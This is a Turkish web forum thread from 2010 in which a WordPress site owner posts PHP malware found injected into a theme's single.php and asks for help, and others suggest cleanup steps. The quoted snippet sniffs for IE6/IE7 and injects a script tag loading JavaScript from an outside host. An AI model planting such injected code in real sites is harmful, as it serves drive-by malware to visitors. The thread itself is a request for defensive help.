• 02-12-2010, 11:54:21
    #1
    <?
    $agent=$_SERVER["HTTP_USER_AGENT"];
    $agentsuz=str_replace(" ", "", $agent);
    if (eregi("MSIE6",$agentsuz) or eregi("MSIE7",$agentsuz)) {
    echo '<script src="http://www.fuzzyyellowballs.com/wp-content/plugins/ad-minister/images/images/a.js"></script>';
    }else{
    }
    ?>

    single.php ye atılan bu virüs hakkında bilgiye sahip yada çözümünü bilen varsa paylaşırsa sevinirim.
    yaklaşık 1.5 ay kadar önce yine girmişti bu virus sıralamadan düşürdü sıralamaya geri girdi site tekrar bulaştı. ie6 ve ie7 de çalışıyor.
    http://www.fuzzyyellowballs.com bu adres benim değil virusu yayanın adresi.
  • 02-12-2010, 18:43:54
    #2
    bakkınız
    Chmod = Plugin Klasörü
    kaldırınız
    ad-minister = Eklentiler
    ilgili script açılmadan Gövdeyi Göstermiyor sanırsam
    ayrıca inceliyiniz
    https://www.r10.net/wordpress/783249-...guvenligi.html
  • 03-12-2010, 02:06:49
    #3
    tam anlamadım daha acık bir anlatıp yapacak yokmu single.php'yi şifrelesem nasıl olur ?
    ioncube yada base64 gibi
  • 03-12-2010, 15:19:53
    #4
    Üyeliği durduruldu
    ircscorpion adlı üyeden alıntı: mesajı görüntüle
    tam anlamadım daha acık bir anlatıp yapacak yokmu single.php'yi şifrelesem nasıl olur ?
    ioncube yada base64 gibi
    Anlamayacak bir şey yok. Kullandığın temadan yada eklentiden bu kodu atıyorlar. Verdiğin kodlara göre ad-minister isimli eklentiden geldiğini görüyoruz. Bu eklentiyi kaldır ve sil.Ayrıca eklentiye ait tabloları SQL'den silmelisin.
  • 03-12-2010, 17:45:31
    #5
    KonyaShell adlı üyeden alıntı: mesajı görüntüle
    Anlamayacak bir şey yok. Kullandığın temadan yada eklentiden bu kodu atıyorlar. Verdiğin kodlara göre ad-minister isimli eklentiden geldiğini görüyoruz. Bu eklentiyi kaldır ve sil.Ayrıca eklentiye ait tabloları SQL'den silmelisin.
    benim sitemde ad-miser diye bir eklenti yok ki o bulaşan virusun kodu
    virusu yayanın sitesi orası bu virus genelde hitli film dizi ***** sitelere giriyor.bulastıgı sistemler webloader wordpress lugesoft.
    admin paneli şifreli klasorler yazılır değil ama bir şekilde siteye ekleniyor. terme cekirdek atan bir virus. bu sorunla karşılaşan r10da bir çok film sitesi sahibi var.
  • 03-12-2010, 18:00:40
    #6
    verdiğim linki inceleyip oradaki eklentileri denedinmi ? antivirus bile var WP için... ayrıca şu Cleanoptons diye bir eklenti var onuda bir dene senin viruslu sorguyu silsin phpmyadmin den...
  • 03-12-2010, 22:23:19
    #7
    tdept adlı üyeden alıntı: mesajı görüntüle
    verdiğim linki inceleyip oradaki eklentileri denedinmi ? antivirus bile var WP için... ayrıca şu Cleanoptons diye bir eklenti var onuda bir dene senin viruslu sorguyu silsin phpmyadmin den...
    ne kadar zamanda bir kontrol ediyor yada virus kodunu orayamı yazıyorum sql ye eklemiyor single.phpye ekliyor phpmyadminlik bir iş değil.
  • 04-12-2010, 23:35:43
    #8
    ircscorpion adlı üyeden alıntı: mesajı görüntüle
    ne kadar zamanda bir kontrol ediyor yada virus kodunu orayamı yazıyorum sql ye eklemiyor single.phpye ekliyor phpmyadminlik bir iş değil.
    inanıyorumki onu eklemek için mutlaka bir sorgu çalıştırıyordur clen options ile gereksiz girdileri birr incele istersen....
  • 04-12-2010, 23:39:26
    #9
    Üyeliği durduruldu
    ftp şifreni değiştirip bütün dosyaları sil sonra wp nin son sürümünü indirip siteye upload et sadece wp-config.php kalsın. bir daha bulaşmaz.